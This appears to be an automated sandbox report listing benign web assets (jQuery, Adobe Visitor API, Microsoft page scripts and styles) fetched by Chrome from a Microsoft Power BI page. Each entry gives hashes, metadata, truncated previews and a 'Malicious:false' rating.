                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (12824)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):58060
                                                                                                                                                                                                                                                          Entropy (8bit):5.596324920359172
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:EFkYe2qD3D1Ug5yKiXcvh5kCThY6g3Eh6rtLMs5M:SY5yKiSin7RFy
                                                                                                                                                                                                                                                          MD5:1986FCF12655BE6003E39A655BEB6F0F
                                                                                                                                                                                                                                                          SHA1:0C90899E47927E6D63E445B6BFE9C986E8621830
                                                                                                                                                                                                                                                          SHA-256:F66185BEC9D95EC9E4C49D1B38F433AB51AEF9853B21B5D3C0DA54F3987EAF0C
                                                                                                                                                                                                                                                          SHA-512:FAD912AC31C6297A4D4EAA4FC263C5EF8ECA0281D79213B64CE606BBC124B0BFD7F1CADF47C34560406AC804EEF87922E25F7D054B3C539F3AE95D30C8EE7FAB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/msonecloudapi/assets/msochead.js
                                                                                                                                                                                                                                                          Preview:/*! Static Override Utilities */.(()=>{window.SOUtil=window.SOUtil||{addStylesheet:(cssStyles,overrideId)=>{const style=document.createElement("style");if(overrideId){style.id="static-override-"+overrideId}style.appendChild(document.createTextNode(cssStyles));document.head.appendChild(style)},pageIsInScope:pageScope=>{const host=location.hostname;const path=location.pathname;const locale=document.documentElement.lang.toLowerCase();const getMarket=marketAware=>{const locale=document.documentElement.lang.toLowerCase();const langCode=locale.split("-")[0];const market=new URLSearchParams(location.search).get("market")?.toLowerCase();if(market&&marketAware!==false){return`${langCode}-${market}`}return locale};const langLocs={"sr-rs":["sr-rs","sr-latn-rs","sr-cyrl-rs"],default:[locale]};const possibleLangLocs=langLocs[locale]||langLocs.default;const pathLocale=possibleLangLocs.find(loc=>path.indexOf(loc)!==-1);const pathNoLocale=path.replace(`/${pathLocale}`,"").replace(/\/$/,"");const previ
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (576)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):59868
                                                                                                                                                                                                                                                          Entropy (8bit):5.549823852454853
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:SlQWqrpRvrzvd49MgfvayRB5lQm6jIlY/rv0/Qql+eGH3Sc1QR40V2JoHivz1U1i:3rpRDzV49wyRBsmBlMXSY70pnduA8
                                                                                                                                                                                                                                                          MD5:30368A72D017E4133BFD3B5D073D06FF
                                                                                                                                                                                                                                                          SHA1:7BD9259C475D46707628108E5A1C33DDAEE43BF3
                                                                                                                                                                                                                                                          SHA-256:ED425C2855B7269156A549BFA9C2594882C8813B1FB3CB52D067D5A9B5471E96
                                                                                                                                                                                                                                                          SHA-512:0A3E298D69906024DC0FB5854F3E57816A81506E513A1823127F4AC7A943A0D942AD8F3D41EB5EC0DB4D2AD8ABE1F39A0B6CDB024C4F547733B9922F676A9BB3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/visitor.min.ACSHASH30368a72d017e4133bfd3b5d073d06ff.js
                                                                                                                                                                                                                                                          Preview:/*.. Adobe Visitor API for JavaScript version: 4.4.0. Copyright 2019 Adobe, Inc. All Rights Reserved. More info available at https://marketing.adobe.com/resources/help/en_US/mcvid/.*/.'use strict';var e=function(){function N(d){return(N="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(f){return typeof f}:function(f){return f&&"function"==typeof Symbol&&f.constructor===Symbol&&f!==Symbol.prototype?"symbol":typeof f})(d)}function O(d,f,g){return f in d?Object.defineProperty(d,f,{value:g,enumerable:!0,configurable:!0,writable:!0}):d[f]=g,d}function P(d,f,g){d=null==d?void 0:d[f];return void 0===d?g:d}function R(d,f){if(d===f)return 0;d=d.toString().split(".");.f=f.toString().split(".");a:{var g=d.concat(f);for(var c=/^\d+$/,k=0,m=g.length;k<m;k++)if(!c.test(g[k])){g=!1;break a}g=!0}if(g){for(;d.length<f.length;)d.push("0");for(;f.length<d.length;)f.push("0");a:{for(g=0;g<d.length;g++){c=parseInt(d[g],10);k=parseInt(f[g],10);if(c>k){d=1;break a}if(k>c){d=-1;break a}}d=0
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):13110
                                                                                                                                                                                                                                                          Entropy (8bit):4.53925643908527
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:tSsg7eeMXX3/4WKtr0hi6QIG0LHDiX+JLBJ:csMedHgWKtJEGYjC+JLBJ
                                                                                                                                                                                                                                                          MD5:42FFFAB3ACD04EA132F8C11D5E26059F
                                                                                                                                                                                                                                                          SHA1:66A844D51A5ED1A66DDB733216A7A2EB25A5729F
                                                                                                                                                                                                                                                          SHA-256:2F495FCAD3C118DBB2E28E094960E942974B43BDA1A9F1243CBA290DADFF0D1D
                                                                                                                                                                                                                                                          SHA-512:10A8A51FC663D18FBB7AE39B01DB347CF383EE60A2FB5F758589C06BBD2FAD7A9C2B0E5C54639AC1EDA35426A646458E74F46944C1551E43AA6FCD6B4640DC3C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:(() => {. /** Create ocrReimagine namespace */. if (!window.ocrReimagine) {. window.ocrReimagine = {};. }.. /** Create Market Selector module namespace */. if (!window.ocrReimagine.MarketSelector) {. window.ocrReimagine.MarketSelector = {};. }.. const cookieExpiryDays = 30;. const cookieKey = 'PMGSKUMarketCk';. /** @type {MarketSelector[]} */. const instances = [];. const queryParamKey = 'market';.. /**. * CSS selector.. * @enum {string}. */. const Selector = {. AFFECTED: '[data-oc-market-selector]',. DATA_MOUNT: '[data-mount="market-selector"]',. FW_LINKS: '[data-regenerate-fwlink="true"]',. SELECT_MENU: '.custom-select-input'. };.. /**. * JS event name.. * @enum {string}. */. const EventName = {. ON_INIT: 'onInit',. ON_REFRESHED: 'onRefreshed',. ON_REMOVE: 'onRemove',. ON_SELECT: 'onSelect',. ON_UPDATE: 'onUpdate'. };.. /**. *
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):89501
                                                                                                                                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):175
                                                                                                                                                                                                                                                          Entropy (8bit):4.68043398329258
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:agWqLs3KOBmKL8ELDSzEfYZBAeOE8c/yCN9xGV9LH1CNILWAcELDlpKOBmKL8ELQ:QqtgLSH9xGf1OILWAfkgXe
                                                                                                                                                                                                                                                          MD5:96F0C5B1219E39B8788028F5C17A5AD9
                                                                                                                                                                                                                                                          SHA1:D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
                                                                                                                                                                                                                                                          SHA-256:1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
                                                                                                                                                                                                                                                          SHA-512:057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (366)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1904
                                                                                                                                                                                                                                                          Entropy (8bit):4.802036868832552
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nl6d5pMwWkcphd5pMwW1qFRFvrukF0gx5eg6eZ3DrvvBuWky86q8HqouQN:lK5m4Ub5m4jvqyVx58eZvgyFqWqy
                                                                                                                                                                                                                                                          MD5:305E80CB22D0F14E474C408C181CB792
                                                                                                                                                                                                                                                          SHA1:8B946E3AD049A39E3BBC925B1D40BBE2F2A7E2B6
                                                                                                                                                                                                                                                          SHA-256:A8FB92359BE5D0FB839DED898756E674A74C9A52DA8340431C2CF24B05AA43C5
                                                                                                                                                                                                                                                          SHA-512:4F398BC8323454C5213EF37A5425A7FB114CE251A8C63C5112001DE1879EA23BBBD8A0C96DA78B7F189C659D63AFE273D90833DB464AEDBA98F6F32EF98BE8D9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing-templates/sku.min.ACSHASH305e80cb22d0f14e474c408c181cb792.js
                                                                                                                                                                                                                                                          Preview:'use strict';function getSkuMarkup(a,c){let b=a.discountedTextTemplate;a.isDiscounted&&b&&(b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.ListPriceKey,c.sku.displayListPrice),b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.MsrpKey,c.sku.displayMSRPPrice));const d=`. <div . class="sku__pricing-discount">. <span class="oc-displayMSRPPrice">${c.sku.displayMSRPPrice}</span>. </div>. `,e=`. <div class="sku__detail-recurrence">. <span class="oc-displayUnit">${a.displayUnitMap[c.productId]}. </span>. </div>. `;return`. <div class="sku__title" data-ocr-pricing-render="title">. <h3 class="oc-product-title">${a.renderTitle}</h3>. </div>. <div class="sku__paragraph" data-ocr-pricing-content="paragraph"></div>. ${a.isDiscounted?`. <p class="sr-only" data-ocr-pricing-render="sc
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):9316
                                                                                                                                                                                                                                                          Entropy (8bit):4.267140948442776
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:7GrOUjDYq5FEF/zj2wrEEegbSYCkK2MlXW2UqEcK9MwC1uAyI9J3Yullgubephg2:qrzjDYq5FEFLjRJpKJxWrqhKGXy83Y3N
                                                                                                                                                                                                                                                          MD5:2B143BED0FF34BC70BC0703346F70E08
                                                                                                                                                                                                                                                          SHA1:7FB14A8842293FD041C7C138285AC2F822AC4B4C
                                                                                                                                                                                                                                                          SHA-256:C35BBDEE4A46BFBF552989E1126E1F09B454EB3DC2523376C38964BF6128BE86
                                                                                                                                                                                                                                                          SHA-512:46BBF881243EC3C27046FCB66F9D8412B459CC7B6DA1ABF0DCB5F70D578F57E9A88D52431753B65F851892055AC17EDD9446E11BA67D7B0DA80B2B2615F67688
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-reimagine-base.min.ACSHASH2b143bed0ff34bc70bc0703346f70e08.js
                                                                                                                                                                                                                                                          Preview:// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEnabled() {. return !!(window.ocrReimagine?.Icon?.getInstances());. }.. /**. * Initialize popover elements with the class 'popover-rte-mount' by looking up inside the target element or entire document.. */. initializePopoverRichTextPlugin() {. if (!this.isPopoverComponentEnabled()) {. return;. }.. // Get all popover rich text elements.. const popoverRichTextElements = this.getPopoverRichTextElements();.. if (!popo
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6824)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):404817
                                                                                                                                                                                                                                                          Entropy (8bit):5.158612400394249
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:3xuveJs8WV1mYCuwo0hjrRJVmxoe1hUGS56XNXf+d78v0VS02no0b2xG:3xuveJs8WV1mYCuwo0hjrRJVmxoe1hU8
                                                                                                                                                                                                                                                          MD5:D51E0DE6249CA5C7D26EF7973DCFD4E1
                                                                                                                                                                                                                                                          SHA1:7E3EE6A96D81B6FB5AB828265D812FB1DC93AC23
                                                                                                                                                                                                                                                          SHA-256:A2CDA6CA1E42E83028B8CB9D6D25A99AC4434324B990D6234A715D861ACF156E
                                                                                                                                                                                                                                                          SHA-512:46A3F8098F817ACBE4BB3B7F00794DF8F471A3C0C01C9953257AEB3F48BB711D278879539BAF9238C80C4BF69329BDA6B7988988F3D964A76E9C7A4AD1DB07A4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/en-us/power-platform/products/power-bi/
                                                                                                                                                                                                                                                          Preview:<!DOCTYPE HTML> <html lang="en-US" dir="ltr"> <head> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <meta http-equiv="x-ua-compatible" content="ie=edge"/> <link rel="SHORTCUT ICON" href="/favicon.ico?v2" type="image/x-icon"/> <meta name="robots" content="index, follow"/> <meta name="template" content="reimagine---product-detail-3"/> <meta name="awa-canvasType" content="web"/> <meta name="awa-isTented" content="false"/> <meta name="awa-pgtmp" content="reimagine---product-detail-3"/> <meta name="awa-pageType" content="Microsoft Power Platform"/> <meta name="awa-market" content="en-us"/> <meta name="awa-cms" content="AEM"/> <meta name="awa-enabledFeatures" content="contentbackfillgenerate;esiproductcards;feature-controlled-mwf;uhf-ms-io-endpoint;uhf-esi-cv;uhf-esi-cache;fraud-greenid;contentsquare;mediapixel;holiday-themer;lazyload-static-components;clientlibDefer;upsellEnabled;contentbackfillpkgdelete;healthcheck;co
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (510)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1973
                                                                                                                                                                                                                                                          Entropy (8bit):4.4914538760871165
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:xCgigRgQgGKgeg5Cgfgy7gBgugDgBCgRgogvg+gdg27eG8T5aW:IlmvhK5TQX7WpMV8V2HgDeG8taW
                                                                                                                                                                                                                                                          MD5:81B1EF0C4A6B80454291234FCD6E45B0
                                                                                                                                                                                                                                                          SHA1:1353F3119D378FFB222149AE19755423EF5347BE
                                                                                                                                                                                                                                                          SHA-256:B05D865A37D5EFC60E028BC9FBC6B63459C78D21B0B70B3797AC97C1AD9BA88D
                                                                                                                                                                                                                                                          SHA-512:6409931AF06BAE75E4CFC57FF2B877915404A9D805F8C9076390C4BC8FF634BA96B2ED561FCC4E57869110E62BE05AB75A1578E7935CEC9605EAA77C893643AD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-reimagine-base.min.ACSHASH81b1ef0c4a6b80454291234fcd6e45b0.css
                                                                                                                                                                                                                                                          Preview:[data-oc-token-text]{display:contents}..editorial-article--chapter .editorial-article__slot .block-heading h1,.editorial-article--chapter .editorial-article__slot .block-heading h2,.editorial-article--chapter .editorial-article__slot .block-heading h3,.editorial-article--chapter .editorial-article__slot .block-heading h4,.editorial-article--chapter .editorial-article__slot .block-heading h5,.editorial-article--chapter .editorial-article__slot .block-heading p{margin-block:var(--root-spacing-xl)}..editorial-article--chapter .editorial-article__slot .block-heading h1:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h2:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h3:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h4:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h5:first-child,.editorial-article--chapter .editorial-article__slot .block-heading p:first-child{ma
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (1999)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):419611
                                                                                                                                                                                                                                                          Entropy (8bit):4.980054379765907
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:qDxREkZQKdaFA/RIc3f+u2wc/WVKSjdJjfMNlR48tmbK+2pA9XDTotHd9:uREkZQKdaFA/RIc3f+Pwc/6KSj7fMNl/
                                                                                                                                                                                                                                                          MD5:3CB55A1B7E29CABDED7D23377524B55E
                                                                                                                                                                                                                                                          SHA1:5731994750E31D9CD11085570630EAC99DC65845
                                                                                                                                                                                                                                                          SHA-256:0953ECFC1629CBBB80658EEC92D00BA89058F6862E5CD742A419412207088D3C
                                                                                                                                                                                                                                                          SHA-512:646E5BDE377A885E321790BDF16E07324754C5670B707F1BE4BC11208E2F2E2644189CECE32BFB9C86D51C503F37053D54E1CCC627ECA92D29A20EF2955A69FB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH3cb55a1b7e29cabded7d23377524b55e.js
                                                                                                                                                                                                                                                          Preview:./*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';.. const ViewPort = {. XS: 0,. SM: 540,. MD: 860,. LG: 1084,. XL: 1400. };. const DetectionUtil = {. /* eslint-disable no-useless-escape, unicorn/better-regex */. detectMobile(includeTabletCheck) {. if (includeTabletCheck === void 0) {. includeTabletCheck = false;. }.. /**. * detect if mobile and/or tablet device. * returns bool. */. let check = false;.. if (includeTabletC
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (1999)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):419611
                                                                                                                                                                                                                                                          Entropy (8bit):4.980054379765907
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:qDxREkZQKdaFA/RIc3f+u2wc/WVKSjdJjfMNlR48tmbK+2pA9XDTotHd9:uREkZQKdaFA/RIc3f+Pwc/6KSj7fMNl/
                                                                                                                                                                                                                                                          MD5:3CB55A1B7E29CABDED7D23377524B55E
                                                                                                                                                                                                                                                          SHA1:5731994750E31D9CD11085570630EAC99DC65845
                                                                                                                                                                                                                                                          SHA-256:0953ECFC1629CBBB80658EEC92D00BA89058F6862E5CD742A419412207088D3C
                                                                                                                                                                                                                                                          SHA-512:646E5BDE377A885E321790BDF16E07324754C5670B707F1BE4BC11208E2F2E2644189CECE32BFB9C86D51C503F37053D54E1CCC627ECA92D29A20EF2955A69FB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:./*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';.. const ViewPort = {. XS: 0,. SM: 540,. MD: 860,. LG: 1084,. XL: 1400. };. const DetectionUtil = {. /* eslint-disable no-useless-escape, unicorn/better-regex */. detectMobile(includeTabletCheck) {. if (includeTabletCheck === void 0) {. includeTabletCheck = false;. }.. /**. * detect if mobile and/or tablet device. * returns bool. */. let check = false;.. if (includeTabletC
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:1
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3116
                                                                                                                                                                                                                                                          Entropy (8bit):4.431505373285771
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:e2rIqX/nyqHytWO/+75xy17A6d/X226/YU3/xopLk/OEBlKj/v4UPnxzgNar4n8u:lIAvyqSRcK66dODQhYUosRZg4hpRV6
                                                                                                                                                                                                                                                          MD5:B884EF4864D6867BD00AA4A7A5CFB368
                                                                                                                                                                                                                                                          SHA1:D45D8BD33632588A913575910B3D0EABD5AD3828
                                                                                                                                                                                                                                                          SHA-256:177F6B14CEB87D301946D00124195EBB755A452BA40ABCA5CF6A4E77E52222F5
                                                                                                                                                                                                                                                          SHA-512:375A8412459BBE64B6024C462D996B4B48DE246997BA36F5E26379F163D5FACA69CECC79E4FD246F92079A23DCD36AC2E8058D2C9663BA9D31C07C6786269581
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/*.*Utility class for handling data storage in the browser's local storage with encoding/decoding support..*Note: This class is designed for storing and retrieving objects in local storage. .*/ ..class LocalStorageUtil {. constructor(opts) {. // Set the storage key from options, defaulting to an empty object. this.storageKey = opts.storageKey || {}; . }. . /**. * Encode the value before storing in local storage. */. encodeValue = (value) => {. if(!value) {. return {};. }. . let encodedValue;. try {. encodedValue = window.btoa(JSON.stringify(value));. } catch(error) {. encodedValue = value. }. return encodedValue;. };. . /**. * Decode the value retrieved from local storage. */. decodeValue = (encodedValue) => {. if(!encodedValue) {. return {};. }. let decodedValue;. try {. decodedValue = window.atob(encodedValue); // Decode the encoded value.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (534)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3288
                                                                                                                                                                                                                                                          Entropy (8bit):4.844125421768654
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:3jndjqDCc6oq7zCE/5j/mj/FlqplzC7l+tj+6j+7bq/jzCd9QtjQAjQQHUqCqzCt:3jdNGKmlklm7dYjmd20tqmMA
                                                                                                                                                                                                                                                          MD5:7677F65C1626AB1BDE509437776D4291
                                                                                                                                                                                                                                                          SHA1:E51C5E64E5ED9D95FFA2BB31B821229F4502BDA9
                                                                                                                                                                                                                                                          SHA-256:76607654EAFACC56092479AD570B118BE287CB2341711030CE47A88AAEC760D2
                                                                                                                                                                                                                                                          SHA-512:5A110A93A5B34B11D371140D59738C5659F2A54614F84C4E683D115E50852DEC3640A8CEE6F394D8584684E0C355C249F5636329B0AC03E73949DEC9423C2652
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
